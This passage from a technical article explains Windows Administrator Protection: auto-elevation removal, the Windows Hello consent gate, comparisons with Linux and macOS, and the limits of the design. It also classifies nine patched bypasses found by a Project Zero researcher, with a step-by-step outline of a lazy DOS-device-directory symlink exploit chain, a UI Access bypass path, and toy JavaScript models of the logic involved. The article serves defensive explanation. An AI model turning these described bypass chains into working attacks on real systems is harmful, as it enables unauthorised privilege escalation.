No auto-elevation. The autoElevate=true manifest attribute is no longer honoured by appinfo.dll under TypeOfAdminApprovalMode = 2. Every elevation that previously went silent now prompts. The Windows Developer Blog states the change directly: "With administrator protection, all auto-elevations in Windows are removed and users need to interactively authorize every admin operation" [@ms-developer-blog-2025]. Forshaw's January 2026 framing of the consequence: "as auto-elevation is no longer permitted they will always show a prompt, therefore these are not considered bypasses" [@forshaw-pz-jan2026]. This is the single most consequential fix in the design. The auto-elevation whitelist was the bypass; removing the whitelist eliminates the class at the source, including the entire silent-elevation primitive class that Forshaw's older RAiProcessRunOnce research relied on.
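The change in prompting behaviour can be summarised as a decision function over the policy value and the binary's whitelist status. This is a simplified sketch: `elevationUi`, its return strings, and the `whitelisted` / `autoElevate` fields are hypothetical, and the mode-1 branch assumes the default consent behaviour described earlier in the article.

```javascript
// Decision sketch using the TypeOfAdminApprovalMode values from the text:
// 0 = UAC disabled, 1 = classic Admin Approval Mode,
// 2 = Admin Approval Mode with Administrator Protection.
function elevationUi(typeOfAdminApprovalMode, binary) {
  if (typeOfAdminApprovalMode === 2) {
    return 'interactive-prompt'; // autoElevate is no longer honoured
  }
  if (typeOfAdminApprovalMode === 1) {
    return binary.whitelisted && binary.autoElevate ? 'silent' : 'interactive-prompt';
  }
  return 'uac-disabled';
}

const autoElevatingBinary = { name: 'fodhelper.exe', whitelisted: true, autoElevate: true };
const ordinaryInstaller = { name: 'setup.exe', whitelisted: false, autoElevate: false };

console.log('classic, auto-elevating binary:', elevationUi(1, autoElevatingBinary));
console.log('classic, ordinary installer:   ', elevationUi(1, ordinaryInstaller));
console.log('AP, auto-elevating binary:     ', elevationUi(2, autoElevatingBinary));
console.log('AP, ordinary installer:        ', elevationUi(2, ordinaryInstaller));
```

Under mode 2 the binary argument is never inspected, which is the model's way of expressing that the whitelist no longer influences the outcome.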

Multi-user separation is the original UNIX privilege model. The `root` user holds privilege; ordinary users do not; the boundary between them is the file-permission system enforced by the kernel. Windows NT shipped the same primitives in 1993 -- discretionary access control lists on every securable object, per-user profiles, multi-user logon sessions -- but the surrounding culture treated Administrator-as-default as the path of least resistance. The architectural sophistication in Administrator Protection is in *linkage* (the SAM forward / back attributes), *lifecycle* (provisioning on policy enable, teardown on process exit), and *enforcement* (removal of auto-elevation as a mechanism). The primitives themselves are old.

The four fixes share a property. Each one breaks a shared resource that an attacker depends on. But there is one more piece of the redesign that has not yet been described: the prompt itself is no longer a Yes/No click-through. The next section asks what happens when the consent UI becomes a credential.

9. Windows Hello as the consent gate

The classic UAC prompt is a Yes / No on the secure desktop. Administrator Protection turns the prompt into a credential prompt for the primary user's Windows Hello: a PIN, a fingerprint, a face match, or a password fallback. The credential is for the primary user, not the SMAA, because the SMAA has no human credentials; the Hello verification is what authorises the cross-profile elevation [@ms-admin-protection, @ms-developer-blog-2025, @forshaw-pz-jan2026].

To talk precisely about what the gate does, name the primitive it closes. Under classic UAC, the consent prompt treated a click on the secure desktop as sufficient evidence of consent; physical presence was the entire evidence requirement. That primitive shows up in three sub-cases that the UAC literature has documented for two decades.

The primitive by which the legacy UAC consent dialog accepted a click on the secure desktop as sufficient evidence of consent, without verifying *who* clicked. Three operational sub-cases follow. *Unattended-session click-through* -- an attacker (or co-located third party) with brief physical access to an unlocked screen showing a UAC prompt clicks Yes on the presumption that whoever is at the keyboard is the legitimate user. *Habituated-click click-through* -- the legitimate user has clicked Yes on hundreds of UAC prompts and clicks one more without conscious attention. *Pretext click-through* -- a malicious application argues a legitimate-looking case to the user and elicits the Yes click. Administrator Protection's credential gate cost-raises all three sub-cases without fully eliminating any [@forshaw-pz-jan2026, @ms-admin-protection].

Unattended-session click-through. An attacker who walks up to an unlocked screen showing a UAC prompt can click Yes and elevate. The legitimate user has authenticated; the prompt assumes the person at the keyboard is the legitimate user. Post-AP, the click is not sufficient. The Hello biometric or PIN is required, and the attacker (who does not know either) cannot complete the gesture. Microsoft's Ignite 2024 framing addresses this primitive implicitly with "elevation rights only when needed" and "interactively authorize every admin operation" [@bleepingcomputer-2024].

Habituated-click click-through. A user who has clicked Yes on hundreds of UAC prompts over the course of a year clicks Yes on a malicious one as reflex. The classic UAC prompt requires no attentional engagement beyond physical presence and a click. Hello's gesture (a four-digit PIN entry, a fingerprint press, a face-recognition glance) is higher-friction and harder to perform inattentively. The Windows Developer Blog frames the property as "just-in-time administrator privileges, incorporating Windows Hello to enhance both security and user convenience" [@ms-developer-blog-2025].

Pretext click-through. A malicious application that argues its case to the user -- a fake installer, a re-skinned setup utility, a Trojan masquerading as a legitimate update -- can elicit a Yes click pre-AP. Post-AP, the user is also asked for a credential, which is a stronger user-side check. The user is more likely to interrogate "why am I being asked for my PIN again?" than "why is a prompt appearing?" Microsoft Learn captures the intent as "users are aware of potentially harmful actions before they occur, providing an extra layer of defense against threats" [@ms-admin-protection].

None of the three sub-cases is fully eliminated. Forshaw is explicit that, under Microsoft's design position, bypasses that result in a visible prompt are not classified as security vulnerabilities and do not receive bulletins, because the user could equivalently have launched the prompt themselves [@forshaw-pz-jan2026]. What the gate does is cost-raise each sub-case. The unattended-screen attack requires a stolen PIN or coerced biometric. The habituated user must perform a gesture that is harder to perform inattentively. The pretext attack must justify the second authentication, not just the first.

What it does not close is worth naming, because three primitives that look like they belong on the credential gate's account sheet were already closed by independent mechanisms, and the article should say so to avoid the common over-attribution mistake.

Synthetic-keystroke SendInput against consent.exe. Already closed by UIPI in Vista 2006, and doubly closed by the secure-desktop switch to Winsta0\Winlogon. Even UI Access processes -- whose purpose is to bypass UIPI for accessibility -- cannot reach into the secure desktop [@forshaw-pz-feb2026].
Headless UI Automation against the prompt. Same UIPI / secure-desktop boundary closes it. Redundant with respect to the credential gate.
CVE-2019-1388-class UI-interaction paths surfaced through the prompt's own UI. Closed by Microsoft's November 2019 HHCtrl patch and the cert-viewer UI redesign, prior to any Administrator Protection development [@nvd-cve-2019-1388].

The credential is hardware-rooted via TPM or Pluton on capable hardware. The PIN is unsealed only under the user's gesture; the biometric flows through Enhanced Sign-in Security (ESS) on capable hardware; the credential itself never leaves the Trusted Platform Module or Pluton enclave when ESS is engaged [@ms-windows-hello-ess]. The detail of the Hello architecture itself -- FIDO2 attestation, the ngc protector, the ESS isolation path through the Secure Kernel -- belongs to the Windows Hello article in this series, and is not re-derived here.

The new risk the gate does not close is the obvious one. Phishing the prompt now phishes a real credential, not just consent. A malicious application that can convince the user to authenticate on its behalf gets the elevation the user would otherwise have given to a legitimate request. The credential remains hardware-rooted and is not exfiltrated to the malware, but the elevation produces a working SMAA token in the attacker's process. This is the surface §15 carries forward to open problems.

Key idea: The credential gate closes one specific primitive: consent-without-identity-verification. It cost-raises three sub-cases (unattended-session, habituated-click, pretext click-through) without eliminating any. The structural boundary is profile separation plus fresh logon session plus auto-elevation removal; the credential gate is the fourth, defence-in-depth, property that ensures the boundary cannot be silently crossed by anyone holding only the limited user's physical access.

The prompt is a credential gate, but it remains a UI element. The next section asks how this elevation model compares to what other operating systems do.

10. Competing approaches: what other operating systems do

Four one-paragraph treatments: Linux, macOS, and two adjacent Microsoft mechanisms. The article does not re-derive each system; it positions Administrator Protection against the field.

Linux: sudo plus PolKit pkexec plus PAM modules. The authority model on Linux is file-based. /etc/sudoers (or its LDAP equivalent) is the policy table; the sudoers plugin reads it and decides whether to permit a given user to run a given command [@sudo-ws-sudoers]. PolKit -- polkitd and its authentication-agent helpers -- is the parallel mechanism for GUI privileged-service requests, with actions and mechanisms separated in the polkit configuration files [@polkit-docs]. Biometric integration arrives through the PAM stack: pam_fprintd for fingerprint, pam_u2f for FIDO2 tokens, pam_yubico for Yubikeys. There is no profile separation by default; sudo -i switches HOME to root's home directory but does not separate per-elevation. The model is per-command authorisation, not per-account isolation.

macOS: Authorization Services plus Touch ID via pam_tid. GUI elevation prompts are gated by authorizationdb, a property-list-format policy database whose rules name which credentials (admin password, Touch ID, system-wide entitlements) authorise which actions [@apple-auth-services]. Touch ID is verified by the Secure Enclave Processor; the credential never leaves the SEP, and Authorization Services integrates with pam_tid to allow sudo invocations to use the gesture [@apple-pam-tid]. There is no separate admin profile; Transparency, Consent, and Control (TCC) guards privileged resource access at the per-action level, not the per-profile level. The Mac architecture privileges hardware-rooted consent (Touch ID, Secure Enclave) over account separation.

Microsoft's own sudo.exe (Windows 11 24H2). An inbox terminal transport that triggers the existing UAC or Administrator Protection pipeline; not an alternative to either [@ms-sudo-docs]. The forceNewWindow mode opens an elevated console in a new window. The disableInput mode keeps the elevated console in the current window but blocks keyboard input to it from the unelevated terminal. The normal (inline) mode preserves POSIX-style pipes between the unelevated and elevated processes. Microsoft Learn warns explicitly about the inline mode: "Sudo for Windows can be used as a potential escalation of privilege vector when enabled in certain configurations" [@ms-sudo-docs]. The mechanism is RPC between the unelevated and elevated sudo.exe processes; the elevation itself still goes through appinfo.dll.

Intune Endpoint Privilege Management (EPM). Cloud-policy-driven virtual-account elevation [@ms-epm-overview]. EPM performs elevation via a virtual account that is not a member of the local Administrators group; the elevation rights are conferred only for the duration of the policy-permitted action. Three elevation modes are available: Automatic (no user interaction), User-confirmed (a prompt), and Elevate as Current User (the action runs as the user's elevated identity rather than the virtual account). EPM is architecturally complementary to Administrator Protection: EPM is the enterprise policy story, Administrator Protection is the per-device architecture story. The two can coexist on the same device.

The distinguishing property of Administrator Protection in this comparison is whole-profile separation: the SMAA's own profile, the SMAA's own HKCU, the SMAA's own library folders, plus a fresh logon session per elevation. Neither Linux sudo nor macOS Authorization Services provides that property as a default desktop primitive. EPM provides per-elevation isolation via the virtual account but does not give the elevated process a persistent profile, which is what makes Administrator Protection's compatibility story so different from EPM's.

Administrator Protection is the architecturally tightest desktop elevation model now in production. The next section asks where the boundary still leaks.

11. Theoretical limits: what Administrator Protection cannot fix

Four structural ceilings.

Showing a prompt is not crossing the boundary. Microsoft's design position is explicit: bypasses that result in a visible elevation prompt do not receive security bulletins, because the user could equivalently have right-clicked "Run as administrator." Forshaw's January 2026 post states the consequence directly: "I expect that malware will still be able to get administrator privileges even if that's just by forcing a user to accept the elevation prompt" [@forshaw-pz-jan2026]. The operational consequence is that social-engineering the consent dialog remains a structural attack surface. The prompt is a UI element. The boundary is the credential gate. The gate is only as strong as the user's resistance to whatever pretext induces them to authenticate.

Definition: A *security boundary*, in the MSRC servicing criteria, is a logical separation between code or data of different trust levels, intended to be enforced by the operating system and accompanied by a Microsoft commitment to issue a security update when an unauthorised crossing is found. UAC under the classic split-token model is classified as a *security feature*, not a boundary; bypasses receive quality-fix attention but not security-bulletin attention. Administrator Protection is the first elevation mechanism classified as a security boundary, with bulletin-grade fixes when it fails [@msrc-servicing-criteria, @forshaw-pz-jan2026].

Admin equals kernel. Once code is running inside an SMAA elevated process, it has the local Administrators group; it can write to HKLM; it can install services; it can load WHQL-signed drivers; it can call into kernel-mode interfaces gated by SeLoadDriverPrivilege and the App Control for Business policy. The MSRC servicing-criteria position that "admin-to-kernel is not a security boundary" continues to apply inside the SMAA [@msrc-servicing-criteria]. Administrator Protection makes the path to admin into a boundary; it does not change the relationship between admin and kernel. Driver-loading controls remain the domain of WHQL signing, the Microsoft Vulnerable Driver Blocklist (default-on in Windows 11 since the 2022 update), App Control for Business policies, and Hypervisor-protected Code Integrity (HVCI) [@ms-vuln-driver-blocklist]. The App Identity article in this series covers the App Control mechanism in detail.

The SMAA is in the local Administrators group. Discretionary access control list-based exposures of admin-only resources -- CREATOR OWNER ACEs on persistent objects, world-writable DACLs on certain \Sessions\0\DosDevices entries, default-permissive ACLs on a handful of legacy registry trees -- still grant the SMAA full access. The boundary is between standard user and SMAA, not between SMAA and SYSTEM. The SMAA is a high-privilege actor inside the operating system; the relationship between it and the rest of the privileged surface is unchanged.

Out of scope per Microsoft Learn. Remote logon, roaming profiles, backup-admin accounts, Managed Service Accounts and group Managed Service Accounts (MSAs and gMSAs), virtual accounts for services, and domain-admin scenarios are explicitly outside the Administrator Protection model in its current form [@ms-admin-protection]. The feature is local-machine-only, interactive-admin-only. Domain administrators who log into a workstation will not see the SMAA path; service accounts under LOCAL SERVICE, NETWORK SERVICE, or IIS_IUSRS are unaffected.

Key idea: Consent-prompt elevation has a genuine architectural ceiling: the prompt is a UI element; the boundary is the credential gate; the gate is only as strong as the user's resistance to social engineering. Closing the gap requires out-of-band consent (smartcard, phone push) or per-action policy without human consent in the loop (EPM's automatic mode). Neither is the default.

Four limits, four sentences. The next section walks the concrete evidence of what actually leaked in the pre-GA Insider Preview builds, and what Microsoft did about it.

12. Forshaw's nine bypasses, classified

Between October 2024, when Administrator Protection first appeared in Insider Preview build 27718, and October 2025, when KB5067036 made the feature available on stable Windows, James Forshaw of Google Project Zero audited the mechanism and found nine separate silent-bypass paths. Microsoft fixed all nine, either before the feature shipped in KB5067036 or in subsequent security bulletins [@forshaw-pz-jan2026]. The fact pattern is the structural confirmation that Administrator Protection is now treated as a security boundary. Under the UAC classification, none of those nine would have received CVEs. Each one would have been a quality bug. The bypass canon ran for twenty years without bulletins. The fact that the first cohort of Administrator Protection bypasses produced nine bulletin-eligible fixes is exactly the change in posture the classification change implies.

All the issues that I reported to Microsoft have been fixed, either prior to the feature being officially released (in optional update KB5067036) or as subsequent security bulletins. -- James Forshaw, *Bypassing Windows Administrator Protection*, Google Project Zero, January 26, 2026 [@forshaw-pz-jan2026]

Walk the nine as three classes.

The lazy DOS device directory hijack

The single most interesting vulnerability in the feature's history is the subject of Forshaw's January 26, 2026 deep analysis [@forshaw-pz-jan2026] and of Project Zero issue 432313668 [@pz-issue-432313668]. The mechanism turns on a behaviour change Administrator Protection itself introduced. Every SMAA elevation gets a fresh logon session, which means the per-logon-session DOS device object directory at \Sessions\0\DosDevices\<LUID> is not created at SMAA logon time. The kernel routine SeGetTokenDeviceMap creates the directory lazily, on the first reference. The owner of the new directory is the owner of the access token that triggered the creation [@forshaw-pz-jan2026, @theregister-2026].

Definition: *Identification-level impersonation* is the impersonation level (`SecurityIdentification`) at which an impersonating thread can read security information about the impersonated token -- the SID set, the privilege set -- but cannot perform privileged operations or open kernel objects as the impersonated user. The kernel allows access checks to consult an identification-level token for *reading* the security information; certain code paths inadvertently use that information for *granting* operations, which is the structural primitive Forshaw's lazy DOS device directory exploit depends on [@forshaw-pz-jan2026].

The SECURITY_IMPERSONATION_LEVEL enumeration in winnt.h defines four levels in ascending order: SecurityAnonymous (value 0), SecurityIdentification (1), SecurityImpersonation (2), SecurityDelegation (3). SecurityIdentification is the second-lowest -- it sits one above SecurityAnonymous -- and is the level Windows uses when it wants to ask the kernel "what would this token be allowed to do?" without actually doing the operation. The trap is when a code path that runs as the caller uses an identification-level impersonation to read a token property -- here, the linked-token field -- and the resulting object inherits the caller's owner SID rather than the impersonated token's.
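
The ordering above can be sketched in a few lines of JavaScript, the language of this article's other pseudocode. The numeric values are the ones listed in the paragraph; the helper names `canReadSecurityInfo` and `canActAsUser` are hypothetical and model only the read-versus-act distinction drawn here, not the kernel's real access-check logic.

```javascript
// Values as listed above for SECURITY_IMPERSONATION_LEVEL in winnt.h.
const ImpersonationLevel = Object.freeze({
  SecurityAnonymous: 0,
  SecurityIdentification: 1,
  SecurityImpersonation: 2,
  SecurityDelegation: 3,
});

// Hypothetical helper: identification level and above may read
// the impersonated token's SID set and privilege set.
function canReadSecurityInfo(level) {
  return level >= ImpersonationLevel.SecurityIdentification;
}

// Hypothetical helper: only impersonation level and above may
// open objects or perform operations as the impersonated user.
function canActAsUser(level) {
  return level >= ImpersonationLevel.SecurityImpersonation;
}

const level = ImpersonationLevel.SecurityIdentification;
console.log(canReadSecurityInfo(level), canActAsUser(level)); // true false
```

The trap described above corresponds to a code path that treats a `true` from the first helper as if it were a `true` from the second.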

The exploit chain. An attacker running as the primary user (filtered token, Medium integrity) starts an elevation. Before the SMAA process touches its DOS device directory, the attacker impersonates the SMAA's TokenLinkedToken at identification level and triggers a code path that walks the directory. The kernel creates \Sessions\0\DosDevices\<SMAA_LUID> lazily; in the affected code path, the owner of the new directory becomes the attacker's primary token's owner SID rather than the SMAA's.

The attacker plants a C: symbolic link inside the directory pointing at an attacker-controlled location. When the elevated SMAA process loads its DLLs, the resolution walks \Sessions\0\DosDevices\<SMAA_LUID>\C: first; the symlink redirects the load to the attacker's directory; the attacker's DLL runs in the High-integrity SMAA process [@forshaw-pz-jan2026].

sequenceDiagram
participant Att as Attacker (limited user)
participant Kern as "Kernel (SeGetTokenDeviceMap)"
participant SMAA as SMAA elevated process

Note over SMAA: Fresh logon session -- DOS device dir not yet created
Att->>Att: Impersonate SMAA TokenLinkedToken at Identification level
Att->>Kern: Reference \Sessions\0\DosDevices\<SMAA_LUID>
Kern->>Kern: Lazy-create directory
Note over Kern: Owner SID inherited from impersonating token
Att->>Kern: Create C: symlink under attacker control
SMAA->>Kern: Resolve C: at first DLL load
Kern-->>SMAA: Returns attacker symlink target
SMAA->>SMAA: Load attacker DLL at High integrity

What makes this bypass extraordinary is that it is caused by the feature's design. Pre-Administrator-Protection, the user's primary logon session was created at desktop logon and the DOS device directory existed before any elevation. Lazy directory creation never came up. The SMAA design's "fresh logon session per elevation" property -- the same property Forshaw's January 2026 pull-quote in §7 establishes via the credential-less LSA logon -- is exactly the precondition the lazy-creation path exploits.

Microsoft's pre-GA fix has two parts. First, the manifest-parsing access check uses the SYSTEM-impersonating-the-low-user identity rather than the user's primary token. Second, the DOS device directory is materialised with the correct owner before any user-controlled code path can trigger the lazy-creation path [@forshaw-pz-jan2026]. The Register's coverage of the disclosure noted "the most notable of the nine bugs he reported was a Logon Sessions flaw that relied upon five different Windows behaviors. He added that he likely only found it because he was previously familiar with the OS's 'weird behavior when creating the DOS device object directory'" [@theregister-2026].
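
A toy model makes the difference between lazy and eager creation concrete. It is a sketch only: a `Map` stands in for the object-manager namespace, ownership is reduced to a string comparison, and the class name, method names, SIDs, LUID, and link target are all hypothetical placeholders. Nothing here reflects the kernel's real data structures or the second half of the fix (the manifest-parsing access check).

```javascript
// Toy model: a Map stands in for the object-manager namespace.
class DeviceMapNamespace {
  constructor() {
    this.directories = new Map(); // path -> { owner, links }
  }

  static pathFor(luid) {
    return `\\Sessions\\0\\DosDevices\\${luid}`;
  }

  // Fixed behaviour: materialise the directory with the correct owner
  // before any user-controlled code can reference it.
  createEagerly(luid, ownerSid) {
    this.directories.set(DeviceMapNamespace.pathFor(luid), {
      owner: ownerSid,
      links: new Map(),
    });
  }

  // Vulnerable behaviour: create on first reference, owned by whoever
  // triggered the creation.
  reference(luid, callerSid) {
    const path = DeviceMapNamespace.pathFor(luid);
    if (!this.directories.has(path)) {
      this.directories.set(path, { owner: callerSid, links: new Map() });
    }
    return this.directories.get(path);
  }

  // In this model only the directory owner may plant a symbolic link.
  createSymlink(luid, callerSid, name, target) {
    const dir = this.reference(luid, callerSid);
    if (dir.owner !== callerSid) return false;
    dir.links.set(name, target);
    return true;
  }
}

// Placeholder identifiers, not real SIDs or LUIDs.
const ATTACKER_SID = 'S-1-5-21-ATTACKER';
const SMAA_SID = 'S-1-5-21-SMAA';
const SMAA_LUID = 'SMAA_LUID';

const lazy = new DeviceMapNamespace();
const planted = lazy.createSymlink(SMAA_LUID, ATTACKER_SID, 'C:', 'attacker-volume');

const eager = new DeviceMapNamespace();
eager.createEagerly(SMAA_LUID, SMAA_SID);
const blocked = eager.createSymlink(SMAA_LUID, ATTACKER_SID, 'C:', 'attacker-volume');

console.log(planted, blocked); // true false
```

In the lazy namespace the attacker's first reference creates the directory and therefore owns it; in the eager namespace the directory already belongs to the SMAA, so the same call fails.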

The five UI Access bypasses

Forshaw's February 2026 post details the second class, comprising five of the nine bypasses [@forshaw-pz-feb2026]. UI Access is a token flag retrofitted in Vista to let accessibility applications cross UIPI. To qualify, an executable needs three things: a manifest declaring uiAccess="true", a trusted code-signing certificate, and an installation location under an administrator-only directory (typically %ProgramFiles%). The Application Information service's RAiLaunchAdminProcess endpoint launches qualifying UI Access processes without showing the consent prompt, on the theory that the three-criteria check is itself sufficient evidence of administrator approval [@forshaw-pz-feb2026].

Definition: *UI Access* is the token flag (`TOKEN_UIACCESS`) that allows a process to interact with windows of higher integrity level than its own, bypassing User Interface Privilege Isolation. UI Access is meant for accessibility software (screen readers, on-screen keyboards) that needs to interact with elevated UI. To qualify, an executable must carry a `uiAccess="true"` manifest, a trusted code-signing certificate, and an administrator-only installation directory; qualifying processes run without showing the consent prompt and at integrity level High [@forshaw-pz-feb2026].
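
The three-criteria check can be sketched as a single predicate. This is an illustration under stated assumptions, not the Application Information service's logic: the `exe` object shape, the function names, and the `SECURE_ROOTS` list are hypothetical, and the path test is a deliberately naive prefix match that performs no canonicalisation.

```javascript
// Hypothetical list of administrator-only roots; the text above names
// %ProgramFiles% as the typical location.
const SECURE_ROOTS = ['C:\\Program Files\\'];

// Naive, case-insensitive prefix test. A real check would have to
// canonicalise the path first; this sketch does not.
function isUnderSecureRoot(installPath, roots = SECURE_ROOTS) {
  const normalised = installPath.toLowerCase();
  return roots.some((root) => normalised.startsWith(root.toLowerCase()));
}

// All three criteria must hold for the prompt-free UI Access launch.
function qualifiesForUiAccess(exe) {
  return exe.manifestUiAccess === true
    && exe.signatureTrusted === true
    && isUnderSecureRoot(exe.installPath);
}

const candidate = {
  manifestUiAccess: true,
  signatureTrusted: true,
  installPath: 'C:\\Users\\alice\\Downloads\\tool.exe',
};
console.log(qualifiesForUiAccess(candidate)); // false
```

Each criterion is a separate place for the check to go wrong, which is why a weakness in any one of them is enough to reach the prompt-free path.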

Under classic UAC, a UI Access process ran with the filtered standard-user token bumped from Medium to High integrity -- not with the full admin token. Forshaw's February 2026 post states the mechanism verbatim: "the service will take a copy of the caller's access token, enable the UI Access flag and increase the integrity level... If the caller is a limited user of an UAC administrator it will set the integrity level to High" [@forshaw-pz-feb2026].

Under Administrator Protection, the pre-GA design preserved that behaviour unchanged: the UI Access process inherited the limited user's primary token (not the SMAA's), bumped to High integrity. That decision was the structural flaw. A High-integrity process under the limited user can interact with the SMAA's windows whenever a High-integrity SMAA process exists on the same desktop, send messages to them, read clipboard data, and -- through GetProcessHandleFromHwnd -- obtain a process handle on the SMAA process that lets the limited-user process inject code into it.

The five UI Access variants exploit different sub-categories of the same structural property. The Quick Assist binary, a remote assistance application on Windows 10 and 11 that carries the uiAccess flag, is one such variant; R41N3RZUF477 published a public proof-of-concept that exploits the BrowserExecutableFolder group policy to make Quick Assist load WebView2 from an attacker-controlled directory [@quickassist-bypass]. The remaining four exploit, respectively, weaknesses in the secure-application-directory check, the manifest parsing routine, COM marshalling in UI Access contexts, and message-only window handling [@forshaw-pz-feb2026].

Microsoft's pre-GA fix is structural: UI Access processes no longer run as the limited user. They are created with a filtered copy of the SMAA's token (the SMAA's SID, the SMAA's profile, but with SeLoadDriverPrivilege and similar removed). Profile separation is restored at the cost of a more complex token-creation path [@forshaw-pz-feb2026].
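
The before-and-after token derivation can be modelled with plain objects. This is a sketch, not a description of real access tokens: the SIDs, profile paths, and privilege lists are placeholders, both function names are hypothetical, and the set of privileges removed by the fix is only partly named in the source, so the `removed` default below is an assumption.

```javascript
// Toy tokens: plain objects with placeholder values.
const limitedUser = {
  sid: 'S-1-5-21-LIMITED',
  profile: 'C:\\Users\\alice',
  integrity: 'Medium',
  privileges: ['SeChangeNotifyPrivilege'],
};
const smaa = {
  sid: 'S-1-5-21-SMAA',
  profile: 'C:\\Users\\ADMIN_example',
  integrity: 'High',
  privileges: ['SeChangeNotifyPrivilege', 'SeLoadDriverPrivilege'],
};

// Pre-GA behaviour as described: copy the caller's token, set the
// UI Access flag, raise integrity to High.
function uiAccessTokenPreFix(callerToken) {
  return { ...callerToken, uiAccess: true, integrity: 'High' };
}

// Post-fix behaviour as described: a filtered copy of the SMAA's token.
// The removal list is an assumption beyond SeLoadDriverPrivilege.
function uiAccessTokenPostFix(smaaToken, removed = ['SeLoadDriverPrivilege']) {
  return {
    ...smaaToken,
    uiAccess: true,
    privileges: smaaToken.privileges.filter((p) => !removed.includes(p)),
  };
}

const pre = uiAccessTokenPreFix(limitedUser);
const post = uiAccessTokenPostFix(smaa);
console.log(pre.sid === limitedUser.sid, pre.integrity); // true High
console.log(post.sid === smaa.sid, post.privileges.join(',')); // true SeChangeNotifyPrivilege
```

The pre-fix token is the problem case in miniature: High integrity, but still the limited user's SID and profile, so it sits on the wrong side of the profile separation.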

The remaining three: implementation flaws

The third class -- three bypasses described by Forshaw only as "implementation flaws and long-standing UAC issues" -- is not detailed publicly [@forshaw-pz-jan2026]. The article does not invent details. Forshaw names the category and cites the framing; the engineering specifics are presumably in Microsoft Security Response Center advisories or are still under disclosure. What can be said is that two of the three appear from Forshaw's framing to be UAC-era bugs that Administrator Protection inherited rather than introduced, and one is an Administrator-Protection-specific implementation flaw.

The bypass canon ran for twenty years without bulletins. The fact that all nine pre-GA Administrator Protection bypasses received fixes -- including a deep one rooted in the feature itself -- is the structural confirmation that the elevation path is now a boundary. The next section asks why Microsoft pulled the feature in December 2025.

13. The compatibility surface and the December 2025 revert

About one month after KB5067036 made Administrator Protection available, Microsoft pulled it. Forshaw, writing in January 2026, gives the canonical attribution: "As of 1st December 2025 the Administrator Protection feature has been disabled by Microsoft while an application compatibility issue is dealt with. The issue is unlikely to be related to anything described in this blog post so the analysis doesn't change" [@forshaw-pz-jan2026]. Microsoft Learn confirms: "The feature previously listed in the October 2025 non-security update (KB5067036) has been reverted and will roll out at a later date" [@ms-admin-protection, @ms-kb5067036].

The November 2025 KB5067036 amendment is worth knowing. Microsoft included an unrelated fix for an AutoCAD MSI-repair UAC-prompt regression in the same cumulative; that fix shipped and was not reverted. The WebView2 installer regression is what caused the Administrator Protection revert specifically [@ms-kb5067036].

The structural causes. The Windows Developer Blog (May 2025) [@ms-developer-blog-2025] enumerates the surface where applications break under the SMAA model.

Single sign-on does not cross. Domain and Microsoft Entra credentials cached for the primary user's session are not available inside the SMAA's session. Any elevated process touching Microsoft Graph, Entra ID, or Kerberos-protected resources must re-authenticate. The login dialogs an elevated installer triggers are not failures of the application; they are consequences of the separated logon session.
Network drives do not carry. Drive-mapping in the primary user's session is not inherited by the SMAA. Installers that mount network shares to install per-machine components break. The workaround for affected installers is to use UNC paths directly rather than drive letters.
Library folders diverge. Files saved to Documents, Desktop, Downloads, or Pictures from an elevated app land in C:\Users\ADMIN_<random>\ rather than the primary user's home. A user clicks Save in an elevated text editor and saves to "Documents"; from their own Explorer, the file is invisible.
HKCU diverges. Application settings -- theme, recent-files lists, per-user COM registrations, last-opened paths -- live in the SMAA's HKCU, not the primary user's. The canonical example in Microsoft's documentation is Notepad's dark-mode theme [@ms-developer-blog-2025]: the primary user sets the theme; an elevated Notepad opens in the default theme; the two sessions never agree.
WebView2 installers fail. The error message "Microsoft Edge can't read and write to its data directory" is the recognisable symptom of an installer that assumes one shared profile. The WebView2 runtime stores per-user state in AppData\Local\Microsoft\EdgeWebView\ under whichever profile is active at install time; if the runtime is installed under the SMAA's profile and then used by an unelevated application running as the primary user, the data-directory write fails. This is the regression that triggered the December 2025 revert.
Hyper-V and WSL incompatibilities. Microsoft Learn explicitly tells IT administrators not to enable Administrator Protection on devices that require Hyper-V or WSL [@ms-admin-protection].
Visual Studio. Microsoft's own development environment is "not supported in such a configuration" when run elevated. Extensions don't carry; settings don't carry; project-dialog paths point at the SMAA's profile rather than the developer's actual workspace.
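
The UNC workaround for the network-drive item can be sketched as a small path rewrite performed before the installer elevates. The function name `toUncPath` and the mapping table are hypothetical; the sketch assumes the caller has already captured the primary user's drive mappings by some other means, since they are not visible from inside the SMAA session.

```javascript
// Rewrites a drive-letter path to its UNC form using a mapping table
// captured in the primary user's session (hypothetical input).
function toUncPath(path, driveMappings) {
  const match = /^([A-Za-z]):\\(.*)$/.exec(path);
  if (!match) return path; // already UNC, or not a drive-letter path
  const root = driveMappings[match[1].toUpperCase()];
  if (!root) return path; // local drive, nothing to rewrite
  return `${root.replace(/\\+$/, '')}\\${match[2]}`;
}

// Placeholder server and share names.
const mappings = { Z: '\\\\fileserver\\installers' };
console.log(toUncPath('Z:\\setup\\app.msi', mappings));
// \\fileserver\installers\setup\app.msi
```

Passing the rewritten path to the elevated process avoids any dependency on a drive letter that exists only in the unelevated session.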

Note: Microsoft Learn explicitly excludes Hyper-V and WSL devices from the recommended enablement set [@ms-admin-protection]. Symptoms of incorrect enablement include WSL distribution startup failures (the WSL service runs under a different account from the launching user, and the SMAA's logon-session-isolation properties interact badly with WSL's named-pipe communication) and Hyper-V Manager connection errors that are difficult to attribute to the elevation model.

I guess app compatibility is ultimately the problem here, Windows isn't designed for such a radical change. I'd have also liked to have seen this as a separate configurable mode rather than replacing admin-approval completely. -- James Forshaw, *Bypassing Windows Administrator Protection*, Google Project Zero, January 26, 2026 [@forshaw-pz-jan2026]

Administrator Protection is the right architecture, and the compatibility surface is the bill of materials for twenty years of admin-as-default assumption. Application developers have written installer logic, theme-persistence code, drive-letter assumptions, and HKCU-shared state into shipping software for two decades, on the structural premise that the elevated process and the unelevated user share a profile. The December 2025 revert is the first iteration's learning round, not a structural failure. The same revert pattern accompanied the Windows Vista UAC rollout in 2006-2007, the Windows 7 auto-elevation introduction in 2009 (which itself softened the Vista prompt fatigue at the cost of the bypass canon), and the Smart App Control rollout in Windows 11 22H2. Microsoft will re-enable Administrator Protection when the WebView2 regression and a handful of installer-pattern fixes have shipped.

The architecture survives audit. The deployment is held back by twenty years of accumulated software assumptions. The next section asks what tools defenders now have that they did not have before.

14. The audit and detection surface

Every privileged operation on a device with Administrator Protection enabled now generates an ETW (Event Tracing for Windows) event in the Microsoft-Windows-LUA provider [@ms-admin-protection]. This is the first time the elevation pipeline itself is the source of a stable, operationally useful audit trail.

The basics.

Provider: Microsoft-Windows-LUA, GUID {93c05d69-51a3-485e-877f-1806a8731346}.
